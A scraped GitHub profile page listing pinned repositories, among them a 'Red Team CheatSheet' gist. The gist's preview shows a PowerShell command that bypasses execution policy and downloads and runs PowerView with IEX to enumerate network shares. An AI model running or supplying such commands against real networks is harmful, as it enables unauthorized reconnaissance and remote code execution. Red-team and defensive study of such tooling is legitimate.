Skip to content
View mehmethafif's full-sized avatar
  • İstanbul

Highlights

  • Pro

Block or report mehmethafif

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned Loading

  1. threadedServerDaemon threadedServerDaemon Public

    A threaded server and a client.

    C

  2. unixLikeFileSystem unixLikeFileSystem Public

    Design and implementation of a simplified UNIX like file system in C

    C 1

  3. Red Team CheatSheet Red Team CheatSheet
    1
    # Domain Recon
    2
    ## ShareFinder - Look for shares on network and check access under current user context & Log to file
    3
    powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
    4
    
                  
    5
    ## Import PowerView Module
  4. epidemicSimulator epidemicSimulator Public

    Designed and implemented a visual simulation of an epidemic within a human society.

    Java